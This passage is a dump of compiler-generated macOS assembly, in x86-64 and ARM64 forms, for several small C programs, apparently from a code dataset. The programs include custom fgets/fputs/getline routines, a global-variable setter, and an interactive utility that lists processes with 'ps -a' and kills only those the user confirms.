.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _foo ## -- Begin function foo .p2align 4, 0x90 _foo: ## @foo .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp movq %rdi, -8(%rbp) movq %rsi, -16(%rbp) movq -16(%rbp), %rax movq %rax, -8(%rbp) popq %rbp retq .cfi_endproc ## -- End function .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $64, %rsp movl $0, -4(%rbp) leaq -36(%rbp), %rax movq %rax, -16(%rbp) leaq -40(%rbp), %rax movq %rax, -24(%rbp) leaq -16(%rbp), %rax movq %rax, -32(%rbp) leaq -48(%rbp), %rax movq %rax, -56(%rbp) leaq -60(%rbp), %rax movq %rax, -48(%rbp) movl $9, -60(%rbp) movq -56(%rbp), %rax movq %rax, -32(%rbp) movq -56(%rbp), %rdi movq -32(%rbp), %rsi callq _foo cmpl $5, -36(%rbp) jne LBB1_2 ## %bb.1: movq -32(%rbp), %rax movq (%rax), %rax movl $10, (%rax) jmp LBB1_3 LBB1_2: movq -24(%rbp), %rax movl $100, (%rax) LBB1_3: jmp LBB1_4 LBB1_4: ## =>This Inner Loop Header: Depth=1 cmpl $10, -60(%rbp) jle LBB1_6 ## %bb.5: ## in Loop: Header=BB1_4 Depth=1 movq -48(%rbp), %rax movl $100, (%rax) jmp LBB1_4 LBB1_6: xorl %eax, %eax addq $64, %rsp popq %rbp retq .cfi_endproc ## -- End function .subsections_via_symbols
the_stack_data/173578513.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: sub sp, sp, #48 .cfi_def_cfa_offset 48 stp x29, x30, [sp, #32] ; 16-byte Folded Spill add x29, sp, #32 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 mov w8, #0 str w8, [sp, #12] ; 4-byte Folded Spill stur wzr, [x29, #-4] stur w0, [x29, #-8] str x1, [sp, #16] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF bl _printf adrp x0, l_.str.1@PAGE add x0, x0, l_.str.1@PAGEOFF bl _printf ldr w0, [sp, #12] ; 4-byte Folded Reload ldp x29, x30, [sp, #32] ; 16-byte Folded Reload add sp, sp, #48 ret .cfi_endproc ; -- End function .globl _fgets_ ; -- Begin function fgets_ .p2align 2 _fgets_: ; @fgets_ .cfi_startproc ; %bb.0: sub sp, sp, #80 .cfi_def_cfa_offset 80 stp x29, x30, [sp, #64] ; 16-byte Folded Spill add x29, sp, #64 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur x0, [x29, #-8] stur w1, [x29, #-12] stur x2, [x29, #-24] ldur x8, [x29, #-8] str x8, [sp, #24] b LBB1_1 LBB1_1: ; =>This Inner Loop Header: Depth=1 ldur w8, [x29, #-12] subs w8, w8, #1 stur w8, [x29, #-12] subs w8, w8, #0 cset w8, le mov w9, #0 str w9, [sp, #20] ; 4-byte Folded Spill tbnz w8, #0, LBB1_3 b LBB1_2 LBB1_2: ; in Loop: Header=BB1_1 Depth=1 ldur x0, [x29, #-24] bl _getc stur w0, [x29, #-28] adds w8, w0, #1 cset w8, ne str w8, [sp, #20] ; 4-byte Folded Spill b LBB1_3 LBB1_3: ; in Loop: Header=BB1_1 Depth=1 ldr w8, [sp, #20] ; 4-byte Folded Reload tbz w8, #0, LBB1_7 b LBB1_4 LBB1_4: ; in Loop: Header=BB1_1 Depth=1 ldur w8, [x29, #-28] ldr x9, [sp, #24] add x10, x9, #1 str x10, [sp, #24] strb w8, [x9] sxtb w8, w8 subs w8, w8, #10 cset w8, ne tbnz w8, #0, LBB1_6 b LBB1_5 LBB1_5: b LBB1_7 LBB1_6: ; in Loop: Header=BB1_1 Depth=1 b LBB1_1 LBB1_7: ldr x8, [sp, #24] strb wzr, [x8] ldr x8, [sp, #24] ldur x9, [x29, #-8] subs x8, x8, x9 cset w8, eq and w9, w8, #0x1 stur w9, [x29, #-28] tbz w8, #0, LBB1_9 b LBB1_8 LBB1_8: mov x8, #0 str x8, [sp, #8] ; 8-byte Folded Spill b LBB1_10 LBB1_9: ldur x8, [x29, #-8] str x8, [sp, #8] ; 8-byte Folded Spill b LBB1_10 LBB1_10: ldr x0, [sp, #8] ; 8-byte Folded Reload ldp x29, x30, [sp, #64] ; 16-byte Folded Reload add sp, sp, #80 ret .cfi_endproc ; -- End function .globl _fputs_ ; -- Begin function fputs_ .p2align 2 _fputs_: ; @fputs_ .cfi_startproc ; %bb.0: sub sp, sp, #48 .cfi_def_cfa_offset 48 stp x29, x30, [sp, #32] ; 16-byte Folded Spill add x29, sp, #32 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur x0, [x29, #-8] str x1, [sp, #16] b LBB2_1 LBB2_1: ; =>This Inner Loop Header: Depth=1 ldur x8, [x29, #-8] add x9, x8, #1 stur x9, [x29, #-8] ldrsb w8, [x8] str w8, [sp, #12] subs w8, w8, #0 cset w8, eq tbnz w8, #0, LBB2_3 b LBB2_2 LBB2_2: ; in Loop: Header=BB2_1 Depth=1 ldr w0, [sp, #12] ldr x1, [sp, #16] bl _putc b LBB2_1 LBB2_3: ldr x0, [sp, #16] bl _ferror mov w8, #0 subs w9, w0, #0 cset w9, ne and w9, w9, #0x1 ands w9, w9, #0x1 csinv w0, w8, wzr, eq ldp x29, x30, [sp, #32] ; 16-byte Folded Reload add sp, sp, #48 ret .cfi_endproc ; -- End function .globl _strlen_ ; -- Begin function strlen_ .p2align 2 _strlen_: ; @strlen_ .cfi_startproc ; %bb.0: sub sp, sp, #16 .cfi_def_cfa_offset 16 str x0, [sp, #8] str wzr, [sp, #4] b LBB3_1 LBB3_1: ; =>This Inner Loop Header: Depth=1 ldr x8, [sp, #8] ldrsw x9, [sp, #4] mov x10, x9 add w10, w10, #1 str w10, [sp, #4] ldrsb w8, [x8, x9] subs w8, w8, #0 cset w8, eq tbnz w8, #0, LBB3_3 b LBB3_2 LBB3_2: ; in Loop: Header=BB3_1 Depth=1 b LBB3_1 LBB3_3: ldr w8, [sp, #4] subs w0, w8, #1 add sp, sp, #16 ret .cfi_endproc ; -- End function .globl _getline_ ; -- Begin function getline_ .p2align 2 _getline_: ; @getline_ .cfi_startproc ; %bb.0: sub sp, sp, #48 .cfi_def_cfa_offset 48 stp x29, x30, [sp, #32] ; 16-byte Folded Spill add x29, sp, #32 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 str x0, [sp, #16] str w1, [sp, #12] ldr x0, [sp, #16] ldr w1, [sp, #12] adrp x8, ___stdinp@GOTPAGE ldr x8, [x8, ___stdinp@GOTPAGEOFF] ldr x2, [x8] bl _fgets_ subs x8, x0, #0 cset w8, ne tbnz w8, #0, LBB4_2 b LBB4_1 LBB4_1: stur wzr, [x29, #-4] b LBB4_3 LBB4_2: ldr x0, [sp, #16] bl _strlen_ stur w0, [x29, #-4] b LBB4_3 LBB4_3: ldur w0, [x29, #-4] ldp x29, x30, [sp, #32] ; 16-byte Folded Reload add sp, sp, #48 ret .cfi_endproc ; -- End function .section __TEXT,__cstring,cstring_literals l_.str: ; @.str .asciz "fgets(), fputs() and getline() implementations\n" l_.str.1: ; @.str.1 .asciz "Nothing to run here. Check source file for details\n" .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $16, %rsp movl $0, -4(%rbp) movl %edi, -8(%rbp) movq %rsi, -16(%rbp) leaq L_.str(%rip), %rdi movb $0, %al callq _printf leaq L_.str.1(%rip), %rdi movb $0, %al callq _printf xorl %eax, %eax addq $16, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _fgets_ ## -- Begin function fgets_ .p2align 4, 0x90 _fgets_: ## @fgets_ .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $64, %rsp movq %rdi, -8(%rbp) movl %esi, -12(%rbp) movq %rdx, -24(%rbp) movq -8(%rbp), %rax movq %rax, -40(%rbp) LBB1_1: ## =>This Inner Loop Header: Depth=1 movl -12(%rbp), %ecx addl $-1, %ecx movl %ecx, -12(%rbp) xorl %eax, %eax ## kill: def $al killed $al killed $eax cmpl $0, %ecx movb %al, -41(%rbp) ## 1-byte Spill jle LBB1_3 ## %bb.2: ## in Loop: Header=BB1_1 Depth=1 movq -24(%rbp), %rdi callq _getc movl %eax, -28(%rbp) cmpl $-1, %eax setne %al movb %al, -41(%rbp) ## 1-byte Spill LBB1_3: ## in Loop: Header=BB1_1 Depth=1 movb -41(%rbp), %al ## 1-byte Reload testb $1, %al jne LBB1_4 jmp LBB1_7 LBB1_4: ## in Loop: Header=BB1_1 Depth=1 movl -28(%rbp), %eax ## kill: def $al killed $al killed $eax movq -40(%rbp), %rcx movq %rcx, %rdx addq $1, %rdx movq %rdx, -40(%rbp) movb %al, (%rcx) movsbl %al, %eax cmpl $10, %eax jne LBB1_6 ## %bb.5: jmp LBB1_7 LBB1_6: ## in Loop: Header=BB1_1 Depth=1 jmp LBB1_1 LBB1_7: movq -40(%rbp), %rax movb $0, (%rax) movq -40(%rbp), %rax cmpq -8(%rbp), %rax sete %al movb %al, %cl andb $1, %cl movzbl %cl, %ecx movl %ecx, -28(%rbp) testb $1, %al jne LBB1_8 jmp LBB1_9 LBB1_8: xorl %eax, %eax ## kill: def $rax killed $eax movq %rax, -56(%rbp) ## 8-byte Spill jmp LBB1_10 LBB1_9: movq -8(%rbp), %rax movq %rax, -56(%rbp) ## 8-byte Spill LBB1_10: movq -56(%rbp), %rax ## 8-byte Reload addq $64, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _fputs_ ## -- Begin function fputs_ .p2align 4, 0x90 _fputs_: ## @fputs_ .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $32, %rsp movq %rdi, -8(%rbp) movq %rsi, -16(%rbp) LBB2_1: ## =>This Inner Loop Header: Depth=1 movq -8(%rbp), %rax movq %rax, %rcx addq $1, %rcx movq %rcx, -8(%rbp) movsbl (%rax), %eax movl %eax, -20(%rbp) cmpl $0, %eax je LBB2_3 ## %bb.2: ## in Loop: Header=BB2_1 Depth=1 movl -20(%rbp), %edi movq -16(%rbp), %rsi callq _putc jmp LBB2_1 LBB2_3: movq -16(%rbp), %rdi callq _ferror movl %eax, %edx xorl %eax, %eax movl $4294967295, %ecx ## imm = 0xFFFFFFFF cmpl $0, %edx cmovnel %ecx, %eax addq $32, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _strlen_ ## -- Begin function strlen_ .p2align 4, 0x90 _strlen_: ## @strlen_ .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp movq %rdi, -8(%rbp) movl $0, -12(%rbp) LBB3_1: ## =>This Inner Loop Header: Depth=1 movq -8(%rbp), %rax movl -12(%rbp), %ecx movl %ecx, %edx addl $1, %edx movl %edx, -12(%rbp) movslq %ecx, %rcx movsbl (%rax,%rcx), %eax cmpl $0, %eax je LBB3_3 ## %bb.2: ## in Loop: Header=BB3_1 Depth=1 jmp LBB3_1 LBB3_3: movl -12(%rbp), %eax subl $1, %eax popq %rbp retq .cfi_endproc ## -- End function .globl _getline_ ## -- Begin function getline_ .p2align 4, 0x90 _getline_: ## @getline_ .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $32, %rsp movq %rdi, -16(%rbp) movl %esi, -20(%rbp) movq -16(%rbp), %rdi movl -20(%rbp), %esi movq ___stdinp@GOTPCREL(%rip), %rax movq (%rax), %rdx callq _fgets_ cmpq $0, %rax jne LBB4_2 ## %bb.1: movl $0, -4(%rbp) jmp LBB4_3 LBB4_2: movq -16(%rbp), %rdi callq _strlen_ movl %eax, -4(%rbp) LBB4_3: movl -4(%rbp), %eax addq $32, %rsp popq %rbp retq .cfi_endproc ## -- End function .section __TEXT,__cstring,cstring_literals L_.str: ## @.str .asciz "fgets(), fputs() and getline() implementations\n" L_.str.1: ## @.str.1 .asciz "Nothing to run here. Check source file for details\n" .subsections_via_symbols
the_stack_data/173579065.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _foo ; -- Begin function foo .p2align 2 _foo: ; @foo .cfi_startproc ; %bb.0: sub sp, sp, #16 .cfi_def_cfa_offset 16 str w0, [sp, #12] ldr w8, [sp, #12] adrp x9, _frob@PAGE str w8, [x9, _frob@PAGEOFF] add sp, sp, #16 ret .cfi_endproc ; -- End function .globl _frob ; @frob .zerofill __DATA,__common,_frob,4,2 .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _foo ## -- Begin function foo .p2align 4, 0x90 _foo: ## @foo .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp movl %edi, -4(%rbp) movl -4(%rbp), %eax movl %eax, _frob(%rip) popq %rbp retq .cfi_endproc ## -- End function .globl _frob ## @frob .zerofill __DATA,__common,_frob,4,2 .subsections_via_symbols
the_stack_data/10283.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: stp x28, x27, [sp, #-32]! ; 16-byte Folded Spill .cfi_def_cfa_offset 32 stp x29, x30, [sp, #16] ; 16-byte Folded Spill add x29, sp, #16 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 .cfi_offset w27, -24 .cfi_offset w28, -32 sub sp, sp, #1104 sub x8, x29, #40 str x8, [sp, #40] ; 8-byte Folded Spill adrp x9, ___stderrp@GOTPAGE ldr x9, [x9, ___stderrp@GOTPAGEOFF] str x9, [sp, #32] ; 8-byte Folded Spill stur wzr, [x29, #-20] stur w0, [x29, #-24] str x1, [x8, #8] ldr x8, [x8, #8] ldr x8, [x8] adrp x9, _progname@GOTPAGE ldr x9, [x9, _progname@GOTPAGEOFF] str x8, [x9] adrp x8, _ps@PAGE ldr x0, [x8, _ps@PAGEOFF] adrp x1, l_.str.1@PAGE add x1, x1, l_.str.1@PAGEOFF bl _popen ldr x9, [sp, #40] ; 8-byte Folded Reload mov x8, x0 str x8, [x9] subs x8, x0, #0 cset w8, ne tbnz w8, #0, LBB0_2 b LBB0_1 LBB0_1: ldr x8, [sp, #32] ; 8-byte Folded Reload ldr x0, [x8] adrp x8, _progname@GOTPAGE ldr x8, [x8, _progname@GOTPAGEOFF] ldr x10, [x8] adrp x8, _ps@PAGE ldr x8, [x8, _ps@PAGEOFF] mov x9, sp str x10, [x9] str x8, [x9, #8] adrp x1, l_.str.2@PAGE add x1, x1, l_.str.2@PAGEOFF bl _fprintf mov w0, #1 bl _exit LBB0_2: ldr x8, [sp, #40] ; 8-byte Folded Reload ldr x2, [x8] add x0, sp, #56 str x0, [sp, #24] ; 8-byte Folded Spill mov w1, #1024 bl _fgets ldr x9, [sp, #32] ; 8-byte Folded Reload ldr x8, [sp, #24] ; 8-byte Folded Reload ldr x0, [x9] mov x9, sp str x8, [x9] adrp x1, l_.str.3@PAGE add x1, x1, l_.str.3@PAGEOFF bl _fprintf b LBB0_3 LBB0_3: ; =>This Inner Loop Header: Depth=1 ldr x8, [sp, #40] ; 8-byte Folded Reload ldr x2, [x8] add x0, sp, #56 mov w1, #1024 bl _fgets subs x8, x0, #0 cset w8, eq tbnz w8, #0, LBB0_10 b LBB0_4 LBB0_4: ; in Loop: Header=BB0_3 Depth=1 ldur w8, [x29, #-24] subs w8, w8, #1 cset w8, eq tbnz w8, #0, LBB0_6 b LBB0_5 LBB0_5: ; in Loop: Header=BB0_3 Depth=1 ldr x8, [sp, #40] ; 8-byte Folded Reload ldr x8, [x8, #8] ldr x1, [x8, #8] add x0, sp, #56 bl _strindex subs w8, w0, #0 cset w8, lt tbnz w8, #0, LBB0_9 b LBB0_6 LBB0_6: ; in Loop: Header=BB0_3 Depth=1 add x0, sp, #56 str x0, [sp, #16] ; 8-byte Folded Spill bl _strlen ldr x9, [sp, #32] ; 8-byte Folded Reload ldr x8, [sp, #16] ; 8-byte Folded Reload subs x11, x0, #1 mov x10, x8 add x10, x10, x11 strb wzr, [x10] ldr x0, [x9] mov x9, sp str x8, [x9] adrp x1, l_.str.4@PAGE add x1, x1, l_.str.4@PAGEOFF bl _fprintf bl _ttyin sxtb w8, w0 subs w8, w8, #121 cset w8, ne tbnz w8, #0, LBB0_8 b LBB0_7 LBB0_7: ; in Loop: Header=BB0_3 Depth=1 mov x9, sp add x8, sp, #52 str x8, [x9] add x0, sp, #56 adrp x1, l_.str.5@PAGE add x1, x1, l_.str.5@PAGEOFF bl _sscanf ldr w0, [sp, #52] mov w1, #9 bl _kill b LBB0_8 LBB0_8: ; in Loop: Header=BB0_3 Depth=1 b LBB0_9 LBB0_9: ; in Loop: Header=BB0_3 Depth=1 b LBB0_3 LBB0_10: mov w0, #0 bl _exit .cfi_endproc ; -- End function .globl _strindex ; -- Begin function strindex .p2align 2 _strindex: ; @strindex .cfi_startproc ; %bb.0: sub sp, sp, #48 .cfi_def_cfa_offset 48 stp x29, x30, [sp, #32] ; 16-byte Folded Spill add x29, sp, #32 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 str x0, [sp, #16] str x1, [sp, #8] ldr x0, [sp, #8] bl _strlen mov x8, x0 str w8, [sp] str wzr, [sp, #4] b LBB1_1 LBB1_1: ; =>This Inner Loop Header: Depth=1 ldr x8, [sp, #16] ldrsw x9, [sp, #4] ldrsb w8, [x8, x9] subs w8, w8, #0 cset w8, eq tbnz w8, #0, LBB1_6 b LBB1_2 LBB1_2: ; in Loop: Header=BB1_1 Depth=1 ldr x8, [sp, #16] ldrsw x9, [sp, #4] add x0, x8, x9 ldr x1, [sp, #8] ldrsw x2, [sp] bl _strncmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB1_4 b LBB1_3 LBB1_3: ldr w8, [sp, #4] stur w8, [x29, #-4] b LBB1_7 LBB1_4: ; in Loop: Header=BB1_1 Depth=1 b LBB1_5 LBB1_5: ; in Loop: Header=BB1_1 Depth=1 ldr w8, [sp, #4] add w8, w8, #1 str w8, [sp, #4] b LBB1_1 LBB1_6: mov w8, #-1 stur w8, [x29, #-4] b LBB1_7 LBB1_7: ldur w0, [x29, #-4] ldp x29, x30, [sp, #32] ; 16-byte Folded Reload add sp, sp, #48 ret .cfi_endproc ; -- End function .globl _ttyin ; -- Begin function ttyin .p2align 2 _ttyin: ; @ttyin .cfi_startproc ; %bb.0: stp x28, x27, [sp, #-32]! ; 16-byte Folded Spill .cfi_def_cfa_offset 32 stp x29, x30, [sp, #16] ; 16-byte Folded Spill add x29, sp, #16 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 .cfi_offset w27, -24 .cfi_offset w28, -32 sub sp, sp, #1040 adrp x8, ___stack_chk_guard@GOTPAGE ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF] ldr x8, [x8] stur x8, [x29, #-24] adrp x8, _ttyin.tty@PAGE ldr x8, [x8, _ttyin.tty@PAGEOFF] subs x8, x8, #0 cset w8, ne tbnz w8, #0, LBB2_2 b LBB2_1 LBB2_1: adrp x0, l_.str.7@PAGE add x0, x0, l_.str.7@PAGEOFF adrp x1, l_.str.1@PAGE add x1, x1, l_.str.1@PAGEOFF bl _efopen adrp x8, _ttyin.tty@PAGE str x0, [x8, _ttyin.tty@PAGEOFF] b LBB2_2 LBB2_2: adrp x8, _ttyin.tty@PAGE ldr x2, [x8, _ttyin.tty@PAGEOFF] add x0, sp, #8 mov w1, #1024 bl _fgets subs x8, x0, #0 cset w8, eq tbnz w8, #0, LBB2_4 b LBB2_3 LBB2_3: ldrsb w8, [sp, #8] subs w8, w8, #113 cset w8, ne tbnz w8, #0, LBB2_5 b LBB2_4 LBB2_4: mov w0, #0 bl _exit LBB2_5: ldrsb w8, [sp, #8] str w8, [sp, #4] ; 4-byte Folded Spill ldur x9, [x29, #-24] adrp x8, ___stack_chk_guard@GOTPAGE ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF] ldr x8, [x8] subs x8, x8, x9 cset w8, eq tbnz w8, #0, LBB2_7 b LBB2_6 LBB2_6: bl ___stack_chk_fail LBB2_7: ldr w0, [sp, #4] ; 4-byte Folded Reload add sp, sp, #1040 ldp x29, x30, [sp, #16] ; 16-byte Folded Reload ldp x28, x27, [sp], #32 ; 16-byte Folded Reload ret .cfi_endproc ; -- End function .globl _efopen ; -- Begin function efopen .p2align 2 _efopen: ; @efopen .cfi_startproc ; %bb.0: sub sp, sp, #64 .cfi_def_cfa_offset 64 stp x29, x30, [sp, #48] ; 16-byte Folded Spill add x29, sp, #48 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur x0, [x29, #-8] stur x1, [x29, #-16] ldur x0, [x29, #-8] ldur x1, [x29, #-16] bl _fopen mov x8, x0 str x8, [sp, #24] subs x8, x0, #0 cset w8, eq tbnz w8, #0, LBB3_2 b LBB3_1 LBB3_1: ldr x0, [sp, #24] ldp x29, x30, [sp, #48] ; 16-byte Folded Reload add sp, sp, #64 ret LBB3_2: adrp x8, ___stderrp@GOTPAGE ldr x8, [x8, ___stderrp@GOTPAGEOFF] ldr x0, [x8] adrp x8, _progname@GOTPAGE ldr x8, [x8, _progname@GOTPAGEOFF] ldr x11, [x8] ldur x10, [x29, #-8] ldur x8, [x29, #-16] mov x9, sp str x11, [x9] str x10, [x9, #8] str x8, [x9, #16] adrp x1, l_.str.6@PAGE add x1, x1, l_.str.6@PAGEOFF bl _fprintf mov w0, #1 bl _exit .cfi_endproc ; -- End function .section __TEXT,__cstring,cstring_literals l_.str: ; @.str .asciz "ps -a" .section __DATA,__data .globl _ps ; @ps .p2align 3 _ps: .quad l_.str .comm _progname,8,3 ; @progname .section __TEXT,__cstring,cstring_literals l_.str.1: ; @.str.1 .asciz "r" l_.str.2: ; @.str.2 .asciz "%s: can't run %s\n" l_.str.3: ; @.str.3 .asciz "%s" l_.str.4: ; @.str.4 .asciz "%s? " l_.str.5: ; @.str.5 .asciz "%d" l_.str.6: ; @.str.6 .asciz "%s: can't open file %s mode %s\n" .zerofill __DATA,__bss,_ttyin.tty,8,3 ; @ttyin.tty l_.str.7: ; @.str.7 .asciz "/dev/tty" .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $1072, %rsp ## imm = 0x430 movl $0, -4(%rbp) movl %edi, -8(%rbp) movq %rsi, -16(%rbp) movq -16(%rbp), %rax movq (%rax), %rcx movq _progname@GOTPCREL(%rip), %rax movq %rcx, (%rax) movq _ps(%rip), %rdi leaq L_.str.1(%rip), %rsi callq _popen movq %rax, -24(%rbp) cmpq $0, %rax jne LBB0_2 ## %bb.1: movq ___stderrp@GOTPCREL(%rip), %rax movq (%rax), %rdi movq _progname@GOTPCREL(%rip), %rax movq (%rax), %rdx movq _ps(%rip), %rcx leaq L_.str.2(%rip), %rsi xorl %eax, %eax ## kill: def $al killed $al killed $eax callq _fprintf movl $1, %edi callq _exit LBB0_2: leaq -1056(%rbp), %rdi movq -24(%rbp), %rdx movl $1024, %esi ## imm = 0x400 callq _fgets movq ___stderrp@GOTPCREL(%rip), %rax movq (%rax), %rdi leaq -1056(%rbp), %rdx leaq L_.str.3(%rip), %rsi movb $0, %al callq _fprintf LBB0_3: ## =>This Inner Loop Header: Depth=1 leaq -1056(%rbp), %rdi movq -24(%rbp), %rdx movl $1024, %esi ## imm = 0x400 callq _fgets cmpq $0, %rax je LBB0_10 ## %bb.4: ## in Loop: Header=BB0_3 Depth=1 cmpl $1, -8(%rbp) je LBB0_6 ## %bb.5: ## in Loop: Header=BB0_3 Depth=1 leaq -1056(%rbp), %rdi movq -16(%rbp), %rax movq 8(%rax), %rsi callq _strindex cmpl $0, %eax jl LBB0_9 LBB0_6: ## in Loop: Header=BB0_3 Depth=1 leaq -1056(%rbp), %rdi callq _strlen subq $1, %rax movb $0, -1056(%rbp,%rax) movq ___stderrp@GOTPCREL(%rip), %rax movq (%rax), %rdi leaq -1056(%rbp), %rdx leaq L_.str.4(%rip), %rsi movb $0, %al callq _fprintf callq _ttyin movsbl %al, %eax cmpl $121, %eax jne LBB0_8 ## %bb.7: ## in Loop: Header=BB0_3 Depth=1 leaq -1056(%rbp), %rdi leaq L_.str.5(%rip), %rsi leaq -1060(%rbp), %rdx movb $0, %al callq _sscanf movl -1060(%rbp), %edi movl $9, %esi callq _kill LBB0_8: ## in Loop: Header=BB0_3 Depth=1 jmp LBB0_9 LBB0_9: ## in Loop: Header=BB0_3 Depth=1 jmp LBB0_3 LBB0_10: xorl %edi, %edi callq _exit .cfi_endproc ## -- End function .globl _strindex ## -- Begin function strindex .p2align 4, 0x90 _strindex: ## @strindex .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $32, %rsp movq %rdi, -16(%rbp) movq %rsi, -24(%rbp) movq -24(%rbp), %rdi callq _strlen ## kill: def $eax killed $eax killed $rax movl %eax, -32(%rbp) movl $0, -28(%rbp) LBB1_1: ## =>This Inner Loop Header: Depth=1 movq -16(%rbp), %rax movslq -28(%rbp), %rcx movsbl (%rax,%rcx), %eax cmpl $0, %eax je LBB1_6 ## %bb.2: ## in Loop: Header=BB1_1 Depth=1 movq -16(%rbp), %rdi movslq -28(%rbp), %rax addq %rax, %rdi movq -24(%rbp), %rsi movslq -32(%rbp), %rdx callq _strncmp cmpl $0, %eax jne LBB1_4 ## %bb.3: movl -28(%rbp), %eax movl %eax, -4(%rbp) jmp LBB1_7 LBB1_4: ## in Loop: Header=BB1_1 Depth=1 jmp LBB1_5 LBB1_5: ## in Loop: Header=BB1_1 Depth=1 movl -28(%rbp), %eax addl $1, %eax movl %eax, -28(%rbp) jmp LBB1_1 LBB1_6: movl $-1, -4(%rbp) LBB1_7: movl -4(%rbp), %eax addq $32, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _ttyin ## -- Begin function ttyin .p2align 4, 0x90 _ttyin: ## @ttyin .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $1056, %rsp ## imm = 0x420 movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq %rax, -8(%rbp) cmpq $0, _ttyin.tty(%rip) jne LBB2_2 ## %bb.1: leaq L_.str.7(%rip), %rdi leaq L_.str.1(%rip), %rsi callq _efopen movq %rax, _ttyin.tty(%rip) LBB2_2: leaq -1040(%rbp), %rdi movq _ttyin.tty(%rip), %rdx movl $1024, %esi ## imm = 0x400 callq _fgets cmpq $0, %rax je LBB2_4 ## %bb.3: movsbl -1040(%rbp), %eax cmpl $113, %eax jne LBB2_5 LBB2_4: xorl %edi, %edi callq _exit LBB2_5: movb -1040(%rbp), %al movb %al, -1041(%rbp) ## 1-byte Spill movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq -8(%rbp), %rcx cmpq %rcx, %rax jne LBB2_7 ## %bb.6: movb -1041(%rbp), %al ## 1-byte Reload movsbl %al, %eax addq $1056, %rsp ## imm = 0x420 popq %rbp retq LBB2_7: callq ___stack_chk_fail ud2 .cfi_endproc ## -- End function .globl _efopen ## -- Begin function efopen .p2align 4, 0x90 _efopen: ## @efopen .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $32, %rsp movq %rdi, -8(%rbp) movq %rsi, -16(%rbp) movq -8(%rbp), %rdi movq -16(%rbp), %rsi callq _fopen movq %rax, -24(%rbp) cmpq $0, %rax je LBB3_2 ## %bb.1: movq -24(%rbp), %rax addq $32, %rsp popq %rbp retq LBB3_2: movq ___stderrp@GOTPCREL(%rip), %rax movq (%rax), %rdi movq _progname@GOTPCREL(%rip), %rax movq (%rax), %rdx movq -8(%rbp), %rcx movq -16(%rbp), %r8 leaq L_.str.6(%rip), %rsi xorl %eax, %eax ## kill: def $al killed $al killed $eax callq _fprintf movl $1, %edi callq _exit .cfi_endproc ## -- End function .section __TEXT,__cstring,cstring_literals L_.str: ## @.str .asciz "ps -a" .section __DATA,__data .globl _ps ## @ps .p2align 3 _ps: .quad L_.str .comm _progname,8,3 ## @progname .section 